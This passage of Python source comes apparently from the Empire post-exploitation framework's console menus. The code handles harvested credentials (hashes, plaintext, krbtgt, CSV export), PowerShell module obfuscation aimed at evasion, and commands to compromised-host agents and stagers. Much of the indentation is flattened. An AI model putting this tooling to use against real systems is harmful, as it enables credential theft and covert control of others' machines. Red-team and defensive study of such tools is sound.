credIDs = [x for x in range(int(parts[0]), int(parts[1]) + 1)]
self.credentials.remove_credentials(credIDs)
else:
self.credentials.remove_credentials(args)
except Exception:
print(helpers.color("[!] Error in remove command parsing."))
print(helpers.color("[!] Format is 'remove <credID>/<credID-credID>/all'"))
return
elif shlex.split(filterTerm)[0].lower() == "export":
args = shlex.split(filterTerm)[1:]
if len(args) != 1:
print(helpers.color("[!] Please supply an output filename/filepath."))
return
else:
self.credentials.export_credentials(args[0])
return
elif shlex.split(filterTerm)[0].lower() == "plaintext":
creds = self.credentials.get_credentials(credtype="plaintext")
elif shlex.split(filterTerm)[0].lower() == "hash":
creds = self.credentials.get_credentials(credtype="hash")
elif shlex.split(filterTerm)[0].lower() == "krbtgt":
creds = self.credentials.get_krbtgt()
else:
creds = self.credentials.get_credentials(filterTerm=filterTerm)
messages.display_credentials(creds)
def do_set(self, line):
"Set a global option (e.g. IP whitelists)."
parts = line.split(' ')
if len(parts) == 1:
print(helpers.color("[!] Please enter 'IP,IP-IP,IP/CIDR' or a file path."))
else:
if parts[0].lower() == "ip_whitelist":
if parts[1] != "" and os.path.exists(parts[1]):
try:
                        with open(parts[1], 'r') as open_file:
                            ipData = open_file.read()
self.agents.ipWhiteList = helpers.generate_ip_list(ipData)
except Exception:
print(helpers.color("[!] Error opening ip file %s" % (parts[1])))
else:
self.agents.ipWhiteList = helpers.generate_ip_list(",".join(parts[1:]))
elif parts[0].lower() == "ip_blacklist":
if parts[1] != "" and os.path.exists(parts[1]):
try:
                        with open(parts[1], 'r') as open_file:
                            ipData = open_file.read()
self.agents.ipBlackList = helpers.generate_ip_list(ipData)
except Exception:
print(helpers.color("[!] Error opening ip file %s" % (parts[1])))
else:
self.agents.ipBlackList = helpers.generate_ip_list(",".join(parts[1:]))
elif parts[0].lower() == "obfuscate":
if parts[1].lower() == "true":
if not helpers.is_powershell_installed():
print(helpers.color(
"[!] PowerShell is not installed and is required to use obfuscation, please install it first."))
else:
self.obfuscate = True
print(helpers.color("[!] Warning: Obfuscate is not compatible with Keyword Obfuscation"))
message = "[*] Obfuscating all future powershell commands run on all agents."
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="empire")
elif parts[1].lower() == "false":
self.obfuscate = False
message = "[*] Future powershell commands run on all agents will not be obfuscated."
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="empire")
else:
print(helpers.color("[!] Valid options for obfuscate are 'true' or 'false'"))
elif parts[0].lower() == "obfuscate_command":
self.obfuscateCommand = parts[1]
else:
print(helpers.color(
"[!] Please choose 'ip_whitelist', 'ip_blacklist', 'obfuscate', or 'obfuscate_command'"))
def do_reset(self, line):
"Reset a global option (e.g. IP whitelists)."
if line.strip().lower() == "ip_whitelist":
self.agents.ipWhiteList = None
if line.strip().lower() == "ip_blacklist":
self.agents.ipBlackList = None
def do_show(self, line):
"Show a global option (e.g. IP whitelists)."
if line.strip().lower() == "ip_whitelist":
print(self.agents.ipWhiteList)
if line.strip().lower() == "ip_blacklist":
print(self.agents.ipBlackList)
if line.strip().lower() == "obfuscate":
print(self.obfuscate)
if line.strip().lower() == "obfuscate_command":
print(self.obfuscateCommand)
def do_load(self, line):
"Loads Empire modules from a non-standard folder."
if line.strip() == '' or not os.path.isdir(line.strip()):
print(helpers.color("[!] Please specify a valid folder to load modules from."))
else:
self.modules.load_modules(rootPath=line.strip())
def do_reload(self, line):
"Reload one (or all) Empire modules."
if line.strip().lower() == "all":
# reload all modules
print("\n" + helpers.color("[*] Reloading all modules.") + "\n")
self.modules.load_modules()
elif os.path.isdir(line.strip()):
# if we're loading an external directory
self.modules.load_modules(rootPath=line.strip())
else:
if line.strip() not in self.modules.modules:
print(helpers.color("[!] Error: invalid module"))
else:
print("\n" + helpers.color("[*] Reloading module: " + line) + "\n")
self.modules.reload_module(line)
def do_keyword(self, line):
"""
Add keyword to database for obfuscation
"""
parts = line.split(' ')
if 1 <= len(parts) < 3:
try:
if len(parts) == 1:
parts.append(random.choice(string.ascii_uppercase) + ''.join(
random.choice(string.ascii_uppercase + string.digits) for _ in range(4)))
Session().add(models.Function(keyword=parts[0],
replacement=parts[1]))
Session().commit()
print(helpers.color("[+] " + parts[0] + " replaced with " + parts[1]))
except Exception:
print(helpers.color("[!] Error: Couldn't connect to Database"))
else:
print(helpers.color("[!] Error: Entry must be a keyword or keyword and replacement string"))
def do_list(self, line):
"""
Lists active agents or listeners.
"""
parts = line.split(' ')
if parts[0].lower() == 'agents':
line = ' '.join(parts[1:])
all_agents = Session().query(models.Agent).all()
if line.strip().lower() == 'stale':
agentsToDisplay = []
for agent in all_agents:
if agent.stale:
                        # the agent has missed its expected check-in window, so display it as stale
agentsToDisplay.append(agent)
messages.display_agents(agentsToDisplay)
elif line.strip() != '':
                # if we're listing agents active in the last X minutes
try:
minutes = int(line.strip())
# grab just the agents active within the specified window (in minutes)
agentsToDisplay = []
for agent in all_agents:
diff = helpers.getutcnow() - agent.lastseen_time
too_old = diff.total_seconds() > int(minutes) * 60
if not too_old:
agentsToDisplay.append(agent)
messages.display_agents(agentsToDisplay)
except Exception:
print(helpers.color("[!] Please enter the minute window for agent checkin."))
else:
messages.display_agents(all_agents)
elif parts[0].lower() == 'listeners':
messages.display_listeners(self.listeners.activeListeners)
messages.display_listeners(self.listeners.get_inactive_listeners(), "Inactive")
def do_interact(self, line):
"Interact with a particular agent."
name = line.strip()
sessionID = self.agents.get_agent_id_db(name)
if sessionID and sessionID != '' and sessionID in self.agents.agents:
AgentMenu(self, sessionID)
else:
print(helpers.color("[!] Please enter a valid agent name"))
def do_preobfuscate(self, line):
"Preobfuscate PowerShell module_source files"
if not helpers.is_powershell_installed():
print(helpers.color(
"[!] PowerShell is not installed and is required to use obfuscation, please install it first."))
return
module = line.strip()
obfuscate_all = False
obfuscate_confirmation = False
reobfuscate = False
# Preobfuscate ALL module_source files
if module == "" or module == "all":
choice = input(helpers.color(
"[>] Preobfuscate all PowerShell module_source files using obfuscation command: \"" + self.obfuscateCommand + "\"?\nThis may take a substantial amount of time. [y/N] ",
"red"))
if choice.lower() != "" and choice.lower()[0] == "y":
obfuscate_all = True
obfuscate_confirmation = True
choice = input(helpers.color("[>] Force reobfuscation of previously obfuscated modules? [y/N] ", "red"))
if choice.lower() != "" and choice.lower()[0] == "y":
reobfuscate = True
# Preobfuscate a selected module_source file
else:
module_source_fullpath = self.installPath + '/data/module_source/' + module
if not os.path.isfile(module_source_fullpath):
print(helpers.color("[!] The module_source file:" + module_source_fullpath + " does not exist."))
return
choice = input(helpers.color(
"[>] Preobfuscate the module_source file: " + module + " using obfuscation command: \"" + self.obfuscateCommand + "\"? [y/N] ",
"red"))
if choice.lower() != "" and choice.lower()[0] == "y":
obfuscate_confirmation = True
choice = input(helpers.color("[>] Force reobfuscation of previously obfuscated modules? [y/N] ", "red"))
if choice.lower() != "" and choice.lower()[0] == "y":
reobfuscate = True
# Perform obfuscation
if obfuscate_confirmation:
if obfuscate_all:
                files = helpers.get_module_source_files()
else:
files = ['/data/module_source/' + module]
for file in files:
file = self.installPath + '/' + file
if reobfuscate or not helpers.is_obfuscated(file):
message = "[*] Obfuscating {}...".format(os.path.basename(file))
signal = json.dumps({
'print': True,
'message': message,
'obfuscated_file': os.path.basename(file)
})
dispatcher.send(signal, sender="empire")
else:
print(
helpers.color("[*] " + os.path.basename(file) + " was already obfuscated. Not reobfuscating."))
helpers.obfuscate_module(file, self.obfuscateCommand, reobfuscate)
def do_report(self, line):
"""
Produce report CSV and log files: sessions.csv, credentials.csv, master.log
"""
rows = Session().query(models.Agent.session_id, models.Agent.hostname, models.Agent.username,
models.Agent.checkin_time).all()
print(helpers.color("[*] Writing data/sessions.csv"))
        with self.lock, open('data/sessions.csv', 'w') as f:
            f.write("SessionID, Hostname, User Name, First Check-in\n")
            for row in rows:
                f.write(row[0] + ',' + row[1] + ',' + row[2] + ',' + str(row[3]) + '\n')
# Credentials CSV
rows = Session().query(models.Credential.domain,
models.Credential.username,
models.Credential.host,
models.Credential.credtype,
models.Credential.password)\
.order_by(models.Credential.domain, models.Credential.credtype, models.Credential.host)\
.all()
print(helpers.color("[*] Writing data/credentials.csv"))
        with self.lock, open('data/credentials.csv', 'w') as f:
            f.write('Domain, Username, Host, Cred Type, Password\n')
            for row in rows:
                # todo vr maybe can replace with
                # f.write(f'{row.domain},{row.username},{row.host},{row.credtype},{row.password}\n')
                row = list(row)
                for n in range(len(row)):
                    if isinstance(row[n], bytes):
                        row[n] = row[n].decode('UTF-8')
                f.write(row[0] + ',' + row[1] + ',' + row[2] + ',' + row[3] + ',' + row[4] + '\n')
# Empire Log
rows = self.run_report_query()
print(helpers.color("[*] Writing data/master.log"))
        with self.lock, open('data/master.log', 'w') as f:
            f.write('Empire Master Taskings & Results Log by timestamp\n')
            f.write('=' * 50 + '\n\n')
            for row in rows:
                # todo vr maybe can replace with
                # f.write(f'\n{xstr(row.timestamp)} - {xstr(row.username)} ({xstr(row.username)})> {xstr(row.hostname)}\n{xstr(row.taskID)}\n{xstr(row.results)}\n')
                row = list(row)
                for n in range(len(row)):
                    if isinstance(row[n], bytes):
                        row[n] = row[n].decode('UTF-8')
                f.write('\n' + xstr(row[0]) + ' - ' + xstr(row[3]) + ' (' + xstr(row[2]) + ')> ' + xstr(
                    row[5]) + '\n' + xstr(row[6]) + '\n' + xstr(row[7]) + '\n')
    def substring(self, session, column, delimiter):
"""
https://stackoverflow.com/a/57763081
"""
        if session.bind.dialect.name == 'sqlite':
            return func.substr(column, func.instr(column, delimiter) + 1)
        elif session.bind.dialect.name == 'mysql':
            return func.substring_index(column, delimiter, -1)
def run_report_query(self):
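        # Builds the rows written to master.log by do_report: select 'task' and 'checkin'
        # reporting events for agents, derive the agent name from the event name via
        # substring(), then outer-join the matching tasking, result, user, and agent
        # records so each row carries timestamp, hostname, username, task, and results.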
reporting_sub_query = Session()\
.query(models.Reporting, self.substring(Session(), models.Reporting.name, '/').label('agent_name'))\
.filter(and_(models.Reporting.name.ilike('agent%'),
or_(models.Reporting.event_type == 'task',
models.Reporting.event_type == 'checkin')))\
.subquery()
return Session()\
.query(reporting_sub_query.c.timestamp,
reporting_sub_query.c.event_type,
reporting_sub_query.c.agent_name,
reporting_sub_query.c.taskID,
models.Agent.hostname,
models.User.username,
models.Tasking.data.label('task'),
models.Result.data.label('results'))\
.join(models.Tasking, and_(models.Tasking.id == reporting_sub_query.c.taskID,
models.Tasking.agent == reporting_sub_query.c.agent_name), isouter=True)\
.join(models.Result, and_(models.Result.id == reporting_sub_query.c.taskID,
models.Result.agent == reporting_sub_query.c.agent_name), isouter=True)\
.join(models.User, models.User.id == models.Tasking.user_id, isouter=True)\
.join(models.Agent, models.Agent.session_id == reporting_sub_query.c.agent_name, isouter=True)\
.all()
def complete_usemodule(self, text, line, begidx, endidx, language=None):
"Tab-complete an Empire module path."
module_names = list(self.modules.modules.keys())
module_names = [x for x in module_names if self.modules.modules[x].enabled]
# suffix each module requiring elevated context with '*'
for module_name in module_names:
try:
if self.modules.modules[module_name].info['NeedsAdmin']:
module_names[module_names.index(module_name)] = (module_name + "*")
            # handle modules without a NeedsAdmin info key
except KeyError:
pass
if language:
module_names = [(module_name[len(language) + 1:]) for module_name in module_names if
module_name.startswith(language)]
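        # cmd hands the completer only the last whitespace-delimited token as `text`, so
        # match candidates against everything typed after the command (mline) and slice
        # them at the offset so the returned completions line up with `text`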
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
module_names = [s[offs:] for s in module_names if s.startswith(mline)]
return module_names
def complete_reload(self, text, line, begidx, endidx):
"Tab-complete an Empire PowerShell module path."
module_names = list(self.modules.modules.keys()) + ["all"]
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in module_names if s.startswith(mline)]
def complete_usestager(self, text, line, begidx, endidx):
"Tab-complete an Empire stager module path."
stagerNames = list(self.stagers.stagers.keys())
if line.split(' ')[1].lower() in stagerNames:
listenerNames = self.listeners.get_listener_names()
endLine = ' '.join(line.split(' ')[1:])
mline = endLine.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in listenerNames if s.startswith(mline)]
else:
            # otherwise tab-complete the stager names
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in stagerNames if s.startswith(mline)]
def complete_uselistener(self, text, line, begidx, endidx):
"Tab-complete an uselistener command"
names = list(self.listeners.loadedListeners.keys())
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in names if s.startswith(mline)]
def complete_setlist(self, text, line, begidx, endidx):
"Tab-complete a global list option"
options = ["listeners", "agents"]
if line.split(' ')[1].lower() in options:
return helpers.complete_path(text, line, arg=True)
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in options if s.startswith(mline)]
def complete_set(self, text, line, begidx, endidx):
"Tab-complete a global option."
options = ["ip_whitelist", "ip_blacklist", "obfuscate", "obfuscate_command"]
if line.split(' ')[1].lower() in options:
return helpers.complete_path(text, line, arg=True)
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in options if s.startswith(mline)]
def complete_load(self, text, line, begidx, endidx):
"Tab-complete a module load path."
return helpers.complete_path(text, line)
def complete_reset(self, text, line, begidx, endidx):
"Tab-complete a global option."
return self.complete_set(text, line, begidx, endidx)
def complete_show(self, text, line, begidx, endidx):
"Tab-complete a global option."
return self.complete_set(text, line, begidx, endidx)
def complete_creds(self, text, line, begidx, endidx):
"Tab-complete 'creds' commands."
commands = ["add", "remove", "export", "hash", "plaintext", "krbtgt"]
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in commands if s.startswith(mline)]
def complete_interact(self, text, line, begidx, endidx):
"Tab-complete an interact command"
names = self.agents.get_agent_names_db()
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in names if s.startswith(mline)]
def complete_list(self, text, line, begidx, endidx):
"Tab-complete list"
return self.complete_setlist(text, line, begidx, endidx)
def complete_preobfuscate(self, text, line, begidx, endidx):
"Tab-complete an interact command"
options = [(option[len('/data/module_source/'):]) for option in helpers.get_module_source_files()]
options.append('all')
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in options if s.startswith(mline)]
class SubMenu(cmd.Cmd):
def __init__(self, mainMenu):
cmd.Cmd.__init__(self)
self.mainMenu = mainMenu
def cmdloop(self):
if len(self.mainMenu.resourceQueue) > 0:
self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0))
cmd.Cmd.cmdloop(self)
def emptyline(self):
pass
def postcmd(self, stop, line):
if line == "back":
return True
if len(self.mainMenu.resourceQueue) > 0:
nextcmd = self.mainMenu.resourceQueue.pop(0)
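            # 'lastautoruncmd' acts as a sentinel in the resource queue; raising
            # 'endautorun' here is presumably caught by the autorun machinery to
            # unwind the nested menu once the queued commands are exhausted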
if nextcmd == "lastautoruncmd":
raise Exception("endautorun")
self.cmdqueue.append(nextcmd)
def do_back(self, line):
"Go back a menu."
return True
def do_listeners(self, line):
"Jump to the listeners menu."
raise NavListeners()
def do_agents(self, line):
"Jump to the agents menu."
raise NavAgents()
def do_main(self, line):
"Go back to the main menu."
raise NavMain()
def do_resource(self, arg):
"Read and execute a list of Empire commands from a file."
self.mainMenu.resourceQueue.extend(self.mainMenu.buildQueue(arg))
def do_exit(self, line):
"Exit Empire."
raise KeyboardInterrupt
def do_creds(self, line):
"Display/return credentials from the database."
self.mainMenu.do_creds(line)
# print a nicely formatted help menu
# stolen/adapted from recon-ng
def print_topics(self, header, commands, cmdlen, maxcol):
if commands:
self.stdout.write("%s\n" % str(header))
if self.ruler:
self.stdout.write("%s\n" % str(self.ruler * len(header)))
for command in commands:
self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__))
self.stdout.write("\n")
# def preloop(self):
# traceback.print_stack()
class AgentsMenu(SubMenu):
"""
The main class used by Empire to drive the 'agents' menu.
"""
def __init__(self, mainMenu):
SubMenu.__init__(self, mainMenu)
self.doc_header = 'Commands'
# set the prompt text
self.prompt = '(Empire: ' + helpers.color("agents", color="blue") + ') > '
messages.display_agents(self.mainMenu.agents.get_agents_db())
def do_back(self, line):
"Go back to the main menu."
raise NavMain()
def do_autorun(self, line):
"Read and execute a list of Empire commands from a file and execute on each new agent \"autorun <resource file> <agent language>\" e.g. \"autorun /root/ps.rc powershell\". Or clear any autorun setting with \"autorun clear\" and show current autorun settings with \"autorun show\""
line = line.strip()
if not line:
print(helpers.color(
"[!] You must specify a resource file, show or clear. e.g. 'autorun /root/res.rc powershell' or 'autorun clear'"))
return
cmds = line.split(' ')
resourceFile = cmds[0]
language = None
if len(cmds) > 1:
language = cmds[1].lower()
elif not resourceFile == "show" and not resourceFile == "clear":
print(helpers.color(
"[!] You must specify the agent language to run this module on. e.g. 'autorun /root/res.rc powershell' or 'autorun /root/res.rc python'"))
return
# show the current autorun settings by language or all
if resourceFile == "show":
if language:
if language in self.mainMenu.autoRuns:
print(self.mainMenu.autoRuns[language])
else:
print("No autorun commands for language %s" % language)
else:
print(self.mainMenu.autoRuns)
# clear autorun settings by language or all
elif resourceFile == "clear":
if language and not language == "all":
if language in self.mainMenu.autoRuns:
self.mainMenu.autoRuns.pop(language)
else:
print("No autorun commands for language %s" % language)
else:
# clear all autoruns
self.mainMenu.autoRuns.clear()
# read in empire commands from the specified resource file
else:
self.mainMenu.autoRuns[language] = self.mainMenu.buildQueue(resourceFile, True)
def do_list(self, line):
"Lists all active agents (or listeners)."
if line.lower().startswith("listeners"):
self.mainMenu.do_list("listeners " + str(' '.join(line.split(' ')[1:])))
elif line.lower().startswith("agents"):
self.mainMenu.do_list("agents " + str(' '.join(line.split(' ')[1:])))
else:
self.mainMenu.do_list("agents " + str(line))
def do_rename(self, line):
"Rename a particular agent."
parts = line.strip().split(' ')
        # make sure we get an old name and new name for the agent
if len(parts) == 2:
# replace the old name with the new name
self.mainMenu.agents.rename_agent(parts[0], parts[1])
else:
print(helpers.color("[!] Please enter an agent name and new name"))
def do_interact(self, line):
"Interact with a particular agent."
name = line.strip()
sessionID = self.mainMenu.agents.get_agent_id_db(name)
if sessionID and sessionID != '' and sessionID in self.mainMenu.agents.agents:
AgentMenu(self.mainMenu, sessionID)
else:
print(helpers.color("[!] Please enter a valid agent name"))
def do_kill(self, line):
"Task one or more agents to exit."
name = line.strip()
if name.lower() == 'all':
try:
choice = input(helpers.color('[>] Kill all agents? [y/N] ', 'red'))
if choice.lower() != '' and choice.lower()[0] == 'y':
allAgents = self.mainMenu.agents.get_agents_db()
for agent in allAgents:
sessionID = agent['session_id']
self.mainMenu.agents.add_agent_task_db(sessionID, 'TASK_EXIT')
except KeyboardInterrupt:
print('')
else:
# extract the sessionID and clear the agent tasking
sessionID = self.mainMenu.agents.get_agent_id_db(name)
if sessionID and len(sessionID) != 0:
try:
choice = input(helpers.color("[>] Kill agent '%s'? [y/N] " % (name), 'red'))
if choice.lower() != '' and choice.lower()[0] == 'y':
self.mainMenu.agents.add_agent_task_db(sessionID, 'TASK_EXIT')
except KeyboardInterrupt:
print('')
else:
print(helpers.color("[!] Invalid agent name"))
def do_clear(self, line):
"Clear one or more agent's taskings."
name = line.strip()
if name.lower() == 'all':
self.mainMenu.agents.clear_agent_tasks_db('all')
elif name.lower() == 'autorun':
self.mainMenu.agents.clear_autoruns_db()
else:
# extract the sessionID and clear the agent tasking
sessionID = self.mainMenu.agents.get_agent_id_db(name)
if sessionID and len(sessionID) != 0:
self.mainMenu.agents.clear_agent_tasks_db(sessionID)
else:
print(helpers.color("[!] Invalid agent name"))
def do_sleep(self, line):
"Task one or more agents to 'sleep [agent/all] interval [jitter]'"
parts = line.strip().split(' ')
if len(parts) == 1:
print(helpers.color("[!] Please enter 'interval [jitter]'"))
elif parts[0].lower() == 'all':
delay = parts[1]
jitter = 0.0
if len(parts) == 3:
jitter = parts[2]
allAgents = self.mainMenu.agents.get_agents_db()
for agent in allAgents:
sessionID = agent['session_id']
# update this agent info in the database
self.mainMenu.agents.set_agent_field_db('delay', delay, sessionID)
self.mainMenu.agents.set_agent_field_db('jitter', jitter, sessionID)
# task the agent
self.mainMenu.agents.add_agent_task_db(sessionID, 'TASK_SHELL',
'Set-Delay ' + str(delay) + ' ' + str(jitter))
# dispatch this event
message = "[*] Tasked agent to delay sleep/jitter {}/{}".format(delay, jitter)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(sessionID))
# update the agent log
msg = "Tasked agent to delay sleep/jitter %s/%s" % (delay, jitter)
self.mainMenu.agents.save_agent_log(sessionID, msg)
else:
# extract the sessionID and clear the agent tasking
sessionID = self.mainMenu.agents.get_agent_id_db(parts[0])
delay = parts[1]
jitter = 0.0
if len(parts) == 3:
jitter = parts[2]
if sessionID and len(sessionID) != 0:
# update this agent's information in the database
self.mainMenu.agents.set_agent_field_db('delay', delay, sessionID)
self.mainMenu.agents.set_agent_field_db('jitter', jitter, sessionID)
self.mainMenu.agents.add_agent_task_db(sessionID, 'TASK_SHELL',
'Set-Delay ' + str(delay) + ' ' + str(jitter))
# dispatch this event
message = "[*] Tasked agent to delay sleep/jitter {}/{}".format(delay, jitter)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(sessionID))
# update the agent log
msg = "Tasked agent to delay sleep/jitter %s/%s" % (delay, jitter)
self.mainMenu.agents.save_agent_log(sessionID, msg)
else:
print(helpers.color("[!] Invalid agent name"))
def do_lostlimit(self, line):
"Task one or more agents to 'lostlimit [agent/all] [number of missed callbacks] '"
parts = line.strip().split(' ')
if len(parts) == 1:
print(helpers.color("[!] Usage: 'lostlimit [agent/all] [number of missed callbacks]"))
elif parts[0].lower() == 'all':
lostLimit = parts[1]
allAgents = self.mainMenu.agents.get_agents_db()
for agent in allAgents:
sessionID = agent['session_id']
# update this agent info in the database
self.mainMenu.agents.set_agent_field_db('lost_limit', lostLimit, sessionID)
# task the agent
self.mainMenu.agents.add_agent_task_db(sessionID, 'TASK_SHELL', 'Set-LostLimit ' + str(lostLimit))
# dispatch this event
message = "[*] Tasked agent to change lost limit {}".format(lostLimit)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(sessionID))
# update the agent log
msg = "Tasked agent to change lost limit %s" % (lostLimit)
self.mainMenu.agents.save_agent_log(sessionID, msg)
else:
# extract the sessionID and clear the agent tasking
sessionID = self.mainMenu.agents.get_agent_id_db(parts[0])
lostLimit = parts[1]
if sessionID and len(sessionID) != 0:
# update this agent's information in the database
self.mainMenu.agents.set_agent_field_db('lost_limit', lostLimit, sessionID)
self.mainMenu.agents.add_agent_task_db(sessionID, 'TASK_SHELL', 'Set-LostLimit ' + str(lostLimit))
# dispatch this event
message = "[*] Tasked agent to change lost limit {}".format(lostLimit)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(sessionID))
# update the agent log
msg = "Tasked agent to change lost limit %s" % (lostLimit)
self.mainMenu.agents.save_agent_log(sessionID, msg)
else:
print(helpers.color("[!] Invalid agent name"))
def do_killdate(self, line):
"Set the killdate for one or more agents (killdate [agent/all] 01/01/2016)."
parts = line.strip().split(' ')
if len(parts) == 1:
print(helpers.color("[!] Usage: 'killdate [agent/all] [01/01/2016]'"))
elif parts[0].lower() == 'all':
date = parts[1]
allAgents = self.mainMenu.agents.get_agents_db()
for agent in allAgents:
sessionID = agent['session_id']
# update this agent's field in the database
self.mainMenu.agents.set_agent_field_db('kill_date', date, sessionID)
# task the agent
self.mainMenu.agents.add_agent_task_db(sessionID, 'TASK_SHELL', "Set-KillDate " + str(date))
# dispatch this event
message = "[*] Tasked agent to set killdate to {}".format(date)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(sessionID))
# update the agent log
msg = "Tasked agent to set killdate to " + str(date)
self.mainMenu.agents.save_agent_log(sessionID, msg)
else:
# extract the sessionID and clear the agent tasking
sessionID = self.mainMenu.agents.get_agent_id_db(parts[0])
date = parts[1]
if sessionID and len(sessionID) != 0:
# update this agent's field in the database
self.mainMenu.agents.set_agent_field_db('kill_date', date, sessionID)
# task the agent
self.mainMenu.agents.add_agent_task_db(sessionID, 'TASK_SHELL', "Set-KillDate " + str(date))
# dispatch this event
message = "[*] Tasked agent to set killdate to {}".format(date)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(sessionID))
# update the agent log
msg = "Tasked agent to set killdate to " + str(date)
self.mainMenu.agents.save_agent_log(sessionID, msg)
else:
print(helpers.color("[!] Invalid agent name"))
def do_workinghours(self, line):
"Set the workinghours for one or more agents (workinghours [agent/all] 9:00-17:00)."
parts = line.strip().split(' ')
if len(parts) == 1:
print(helpers.color("[!] Usage: 'workinghours [agent/all] [9:00-17:00]'"))
elif parts[0].lower() == 'all':
hours = parts[1]
hours = hours.replace(',', '-')
allAgents = self.mainMenu.agents.get_agents_db()
for agent in allAgents:
sessionID = agent['session_id']
# update this agent's field in the database
self.mainMenu.agents.set_agent_field_db('working_hours', hours, sessionID)
# task the agent
self.mainMenu.agents.add_agent_task_db(sessionID, 'TASK_SHELL', "Set-WorkingHours " + str(hours))
# dispatch this event
message = "[*] Tasked agent to set working hours to {}".format(hours)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(sessionID))
# update the agent log
msg = "Tasked agent to set working hours to %s" % (hours)
self.mainMenu.agents.save_agent_log(sessionID, msg)
else:
# extract the sessionID and clear the agent tasking
sessionID = self.mainMenu.agents.get_agent_id_db(parts[0])
hours = parts[1]
hours = hours.replace(",", "-")
if sessionID and len(sessionID) != 0:
# update this agent's field in the database
self.mainMenu.agents.set_agent_field_db('working_hours', hours, sessionID)
# task the agent
self.mainMenu.agents.add_agent_task_db(sessionID, 'TASK_SHELL', "Set-WorkingHours " + str(hours))
# dispatch this event
message = "[*] Tasked agent to set working hours to {}".format(hours)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(sessionID))
# update the agent log
msg = "Tasked agent to set working hours to %s" % (hours)
self.mainMenu.agents.save_agent_log(sessionID, msg)
else:
print(helpers.color("[!] Invalid agent name"))
def do_remove(self, line):
"Remove one or more agents from the database."
name = line.strip()
if name.lower() == 'all':
try:
choice = input(helpers.color('[>] Remove all agents from the database? [y/N] ', 'red'))
if choice.lower() != '' and choice.lower()[0] == 'y':
self.mainMenu.agents.remove_agent_db('%')
except KeyboardInterrupt:
print('')
elif name.lower() == 'stale':
# remove 'stale' agents that have missed their checkin intervals
all_agents = Session().query(models.Agent).all()
for agent in all_agents:
if agent.stale:
# if the last checkin time exceeds the limit, remove it
Session().delete(agent)
Session().commit()
elif name.isdigit():
# if we're removing agents that checked in longer than X minutes ago
all_agents = Session().query(models.Agent).all()
try:
minutes = int(line.strip())
# grab just the agents active within the specified window (in minutes)
for agent in all_agents:
diff = helpers.getutcnow() - agent.lastseen_time
too_old = diff.total_seconds() > int(minutes) * 60
if too_old:
# if the last checkin time exceeds the limit, remove it
Session().delete(agent)
Session().commit()
            except Exception:
print(helpers.color("[!] Please enter the minute window for agent checkin."))
else:
# extract the sessionID and clear the agent tasking
session_id = self.mainMenu.agents.get_agent_id_db(name)
if session_id and len(session_id) != 0:
self.mainMenu.agents.remove_agent_db(session_id)
else:
print(helpers.color("[!] Invalid agent name"))
def do_usestager(self, line):
"Use an Empire stager."
parts = line.split(' ')
if parts[0] not in self.mainMenu.stagers.stagers:
print(helpers.color("[!] Error: invalid stager module"))
elif len(parts) == 1:
stager_menu = StagerMenu(self.mainMenu, parts[0])
stager_menu.cmdloop()
elif len(parts) == 2:
listener = parts[1]
if not self.mainMenu.listeners.is_listener_valid(listener):
print(helpers.color("[!] Please enter a valid listener name or ID"))
else:
self.mainMenu.stagers.set_stager_option('Listener', listener)
stager_menu = StagerMenu(self.mainMenu, parts[0])
stager_menu.cmdloop()
else:
print(helpers.color("[!] Error in AgentsMenu's do_userstager()"))
def do_usemodule(self, line):
"Use an Empire PowerShell module."
# Strip asterisks added by MainMenu.complete_usemodule()
module = line.strip().rstrip("*")
if module not in self.mainMenu.modules.modules:
print(helpers.color("[!] Error: invalid module"))
else:
# set agent to "all"
module_menu = ModuleMenu(self.mainMenu, line, agent="all")
module_menu.cmdloop()
def do_searchmodule(self, line):
"Search Empire module names/descriptions."
searchTerm = line.strip()
if searchTerm.strip() == "":
print(helpers.color("[!] Please enter a search term."))
else:
self.mainMenu.modules.search_modules(searchTerm)
def do_uselistener(self, line):
"Use an Empire listener module."
parts = line.split(' ')
if parts[0] not in self.mainMenu.listeners.loadedListeners:
print(helpers.color("[!] Error: invalid listener module"))
else:
listenerMenu = ListenerMenu(self.mainMenu, parts[0])
listenerMenu.cmdloop()
def complete_interact(self, text, line, begidx, endidx):
"Tab-complete an interact command"
names = self.mainMenu.agents.get_agent_names_db()
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
        # normalize agent names to str in case the DB layer returns them as bytes
        names_return = [name.decode("UTF-8") if isinstance(name, bytes) else name for name in names]
        return [s[offs:] for s in names_return if s.startswith(mline)]
def complete_rename(self, text, line, begidx, endidx):
"Tab-complete a rename command"
return self.complete_interact(text, line, begidx, endidx)
def complete_clear(self, text, line, begidx, endidx):
"Tab-complete a clear command"
names = self.mainMenu.agents.get_agent_names_db() + ["all", "autorun"]
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in names if s.startswith(mline)]
def complete_remove(self, text, line, begidx, endidx):
"Tab-complete a remove command"
names = self.mainMenu.agents.get_agent_names_db() + ["all", "stale"]
